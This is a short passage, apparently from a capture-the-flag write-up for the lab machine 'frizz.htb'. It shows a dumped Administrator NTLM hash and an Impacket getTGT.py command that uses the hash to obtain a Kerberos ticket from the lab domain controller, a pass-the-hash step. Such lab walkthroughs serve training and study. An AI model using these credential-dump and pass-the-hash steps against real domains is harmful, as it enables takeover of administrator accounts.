Administrator:500:aad3b435b51404eeaad3b435b51404ee:c457b5f1c315bef53b9cabc92e993d0b:::
```

Request an Administrator TGT:

```bash
getTGT.py 'frizz.htb'/'Administrator' -hashes ':c457b5f1c315bef53b9cabc92e993d0b' -dc-ip 10.129.239.254
[*] Saving ticket in Administrator.ccache
```